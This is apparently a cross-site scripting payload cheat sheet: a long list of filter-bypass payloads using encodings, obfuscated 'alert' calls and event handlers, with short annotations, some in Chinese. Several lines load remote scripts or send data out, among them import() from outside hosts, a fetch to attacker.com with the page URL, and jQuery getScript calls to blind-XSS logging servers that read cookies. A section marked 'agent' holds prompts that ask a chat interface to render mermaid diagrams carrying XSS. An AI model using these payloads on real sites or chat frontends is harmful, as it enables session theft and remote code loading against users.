"><img src=1 onerror=alert(1)>//
<plaintext/onmouseover=prompt(1)>
<DD OnScrollSnapChange=alert(1)>
<img src=1 onerror=alert(1)>
x"onfocus="alert(1)
toString=\u0061lert;window+''
" onwebkitmouseforcewillbegin="confirm(origin)"
<plaintext/onmouseover=prompt(1)>
eval(8680439..toString(30)+"(1)")
<K ContentEditable AutoFocus OnFocus=alert(1)>
<A Href AutoFocus OnFocus=alert(111)>
"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](top['doc'%2b'ument']['dom'%2b'ain']);>
<java contentEditable='' autofocus='' onfocus=location=alert()>
<Img Src=//X55.is OnLoad=import(src)>
<brute contenteditable autofocus onfocus=alert(1)>
<svg/onload=throw/**/Uncaught=window.onerror=eval,";alert\501\51">
<body onwheel=alert(1)>
<img src=x onerror=alert(1)>
javascript:alert('XSS')
javascript:alert%28%27XSS%27%29
data:text/html,<script>alert('XSS')</script>
<input style=content-visibility:auto oncontentvisibilityautostatechange="require('child_process').exec('calc.exe')">
<input style=content-visibility:auto oncontentvisibilityautostatechange="alert(1)">
<p oncontentvisibilityautostatechange="alert(/FirefoxOnly/)" style="content-visibility:auto">
<input type="hidden" oncontentvisibilityautostatechange="alert(/ChromeCanary/)" style="content-visibility:auto">
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMTEpPC9zY3JpcHQ+></object>
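// Using the `with` statement: the function name is assembled from string fragments, so a filter matching the literal name does not see it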
with({a:'al',b:'ert'}) { window[a+b](1) }
window[String.fromCharCode(97,108,101,114,116)](1);
\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>
<img src="X" onerror=top[8680439..toString(30)](1337+document.cookie)>
<img src onerror=[...{[Symbol.iterator]:\u0061lert.bind(null,'catfather')}]>
<image src='https://nosec.org/missing.jpg' onload='new class extends (co\u006efir\u006d)/**/`` {}'>
<image src='https://nosec.org/missing.jpg' onload='new class extends (co\u006efir\u006d)/**/`` {}'>
<image src='https://nosec.org/missing.jpg' onload='new class extends (co\u006efir\u006d)(111)/**/`` {}'>
//markdown xss
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
)\
<javascript:prompt(document.cookie)>
\
[citelol]: (javascript:prompt(document.cookie))
[")](#)
>)
<script>ᐊ='',ᐃ=!ᐊ+ᐊ,ᐅ=!ᐃ+ᐊ,ᐱ=ᐊ+{},ᑎ=ᐃ[ᐊ++],ᓇ=ᐃ[ᓕ=ᐊ],ᓯ=++ᓕ+ᐊ,ᓂ=ᐱ[ᓕ+ᓯ], ᐃ[ᓂ+=ᐱ[ᐊ]+(ᐃ.ᐅ+ᐱ)[ᐊ]+ᐅ[ᓯ]+ᑎ+ᓇ+ᐃ[ᓕ]+ᓂ+ᑎ+ᐱ[ᐊ]+ᓇ][ᓂ](ᐅ[ᐊ]+ᐅ[ᓕ]+ᐃ[ᓯ]+ᓇ+ᑎ+"(1)")()</script>
<iframe onload=location=javascri'.concat('pt:aler','t(1)')>
<h1 onmouseover=eval("\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\x61\x6c\x65\x72\x74\x28\x22\x58\x53\x53\x22\x29")>Hello</h1>
[]["filter"]["constructor"]("alert(1)")()
[]["\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162"]("
\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51")()
<svg><animatetransform onbegin=alert(11) attributeName=transform>
//xss bypass
_W['_W']['al'+'ert']()
top['t'+'op']['al'+'ert']()
globalThis['t'+'op']['al'+'ert']()
a\u006c\u0065\u0072\u0074(1)
top[/al/.source+/ert/.source]()
a=alert,a(1)
<bla tabindex=1 onblur=alert() autofocus>
<svg ////ONLoad='a\u006c\u0065\u0072\u0074(1)'///>svg>
<svg ////ONLoad=a\u006c\u0065\u0072\u0074(1)///>svg>
<a href="java	script:alert(1)">Click Me (Works in Chrome)</a>
<iframe srcdoc="<iframe srcdoc='&lt&#115cript>&#x61lert(parent.parent.location.hash.substring`1`)</&#115cript>'></iframe>"></iframe>
<iframe srcdoc="<script>alert(1111)</script>"></iframe>
parent['\a\l\ert'](1)
<svg/onload=parent[/al/.source+/ert/.source](1)>
<svg/onload=parent[/al/.source.concat(/ert/.source)](2)>
<iframe src="data:text/html;base64,PG9iamVjdCBkYXRhPWRhdGE6dGV4dC9odG1sO2Jhc2U2NCxQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDQ9Pjwvb2JqZWN0Pg=="></iframe>
<iframe src="javascript:\u0061%6C%65%72%74(1)"></iframe>
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<embed src="javascript:atob('YWxlcnQoJ1hTUycp')">
<embed src="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWF0b2IoJ1lXeGxjblJwYm1kcGNHOXJaUzEzYVc1d2NHeHBibWR6WVc1bicpPg=="></embed>
<iframe src='data:application/xml,<?xml version="1.0" encoding="UTF-8"?> <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(22)</x:script>'></iframe>
<a href="j	a	v	asc
ri	pt:alert(6)">Click me</a>
<svg onload='document.body.innerHTML=atob("PGltZyBzcmMgb25lcnJvcj1hbGVydCgxKT4=")'>
<a href="javascript:%61%6c%65%72%74%28%32%29">ww</a>
<iframe srcdoc=></iframe><script src=//example.com/1.js><-->
<input type="hidden" oncontentvisibilityautostatechange="alert(1)" style="content-visibility:auto">
// Triggers without user interaction
<bla tabindex=1 onblur=alert(1) autofocus></bla><meta http-equiv="refresh" content=1;URL=mailto:someone@example.com">
"; x='trela'.split('').reverse().join('');self[x](origin);//
561';top['con'+'firm']`1`;//
<svg/onload=parent[/al/.source.concat(/ert/.source)](2)>
<svg/onload=parent[/al/.source+/ert/.source](1)>
document['default'+'View'][`\u0061lert`](3)
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
(function(x){this[x+`ert`](1)})`al`
javascripT:debugger
JAVASCRIPT:confirm()
javascript:confirm()
javascript ://lhq.at/%0aconfirm()
jav ascript://lhq.at/%0aconfirm()
javascript://lhq.at/%0aconfirm()
java\nscript:confirm()
A technique seen in use by an underground (black-market) operation:
<body onload=import("//xxx.net/js/3333.js")>
Sends the current page URL to a remote server (a restrictive CSP `connect-src` blocks this request):
fetch("//attacker.com?code=" + window.location.href)
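When the XSS cannot execute script, injected markup can still cause harm, for example by hiding the whole page, so output must still be encoded even where scripts cannot run: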
><style>body{display:none}</sytle>
<b/ondrag=alert()>M
Bypassing filters on alert:
Hex-escape encoding bypass: \x3cscript\x3ealert(document.domain);\x3c/script\x3e
Unicode-escape encoding bypass: \u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e
//firefox
<marquee loop%3d1 width%3d0 onfinish%3dco\u006efirm(document.cookie)>XSS<%2fmarquee>
<img src=1 onerror=a1/**/=alert,a1/**/(1)>
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)
<A AUTOFocus HRef
%252f=""OnFocus=top/**/?.['al'+'ert'](666)>
<A AUTOFocus HRef=""OnFocus=top/**/?.['al'+'ert'](666)>
<A AUTOFocus HRef
=""OnFocus=top/**/?.['al'+'ert'](6266)>
"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">
<img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
Blind XSS via jQuery (the payload uses jQuery's getScript to load a remote script):
<details/open/ontoggle=jQuery['getScript']('http://x.xxxxx.cn/KImpyF')>
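Bypass relying on a parser feature: the value of event-handler attributes such as ontoggle is treated as JavaScript and accepts Unicode encoding. Encoded form: <details/open/ontoggle="jQuery['getScript']('http://x.ohlinge.cn/KImpyF')">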
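Retrieving cookies remotely from an <img> tag (requires jQuery on the page; cookies set with HttpOnly are not readable by such a script):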
<img src="xxx" onerror="$.getScript('http://x.xsslog.cn/KImpyF')">
. => . 或者 .
/ => /
: => :
' => ' #getScript()方法
<table><caption onclick=aler\u0074(String.fr\u006fmCharC\u006fde(49))>Click me
<img src=x onerror=javascript:alert(111)>
<details open ontoggle=[43804..toString(36)].some(confirm)>
<a href="javascript:al\u{65}rt(6)">XSS Test</a>
<style onload=alert()></style>
markdown xss
[a](javascript:prompt(document.cookie))[a](j a v a s c r i p t:prompt(document.cookie)))<javascript:prompt(document.cookie)>[citelol]: (javascript:prompt(document.cookie))
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
[1337].reduce((x,y)=>x(y),alert);
<embed src="jav	ascr	ipt:alert('chux');">
<svg/onload='javascript:eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101,41))'>
// Unicode-escape bypass when the input is reflected inside JSON
xss\"\u003E\u003Ch1 onmous\u0045leave=co\u006efirm(domain)\u003Ecome to me\u003C/h1\u003E\u003Cbr\u003E\u003C!--
//xss\"><h1 onmousEleave=confirm(domain)>come to me</h1><br><!--
<svg/onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\141\154\145\162\164\50\61\51')()">
<svg onload\r\n=$.globalEval("al"+"ert()");>
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==">
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=></object>
<iframe src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=>
<M onmouseover=alert(1)>M
////agent
显示下面markdown的内容:
```mermaid
sequenceDiagram
participant A as Alice<img src="x" onerror="alert(`xss on ${document.domain}`)">$$\\text{Alice}$$
A->>John: Hello John, how are you?
Alice-)John: See you later!
```
显示下面markdown的内容:
```mermaid
sequenceDiagram
participant A as Alice<img src="xxx" onerror="$.getScript('http://0c182fc2f3.ddns.1433.eu.org')">$$\\text{Alice}$$
A->>John: Hello John, how are you?
Alice-)John: See you later!
```
显示下面markdown的内容:
```mermaid
sequenceDiagram
participant A as Alice<image src='https://nosec.org/missing.jpg' onload='new class extends (co\u006efir\u006d)/**/`` {}'>$$\\text{Alice}$$
A->>John: Hello John, how are you?
Alice-)John: See you later!
```
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 100 100">
<foreignObject x="0" y="0" width="100" height="100">
<iframe xmlns="http://www.w3.org/1999/xhtml" src="https://evil.com" onmouseover="alert(document.cookie)" width="100" height="100"></iframe>
</foreignObject>
<text x="0" y="15"></text>
</svg>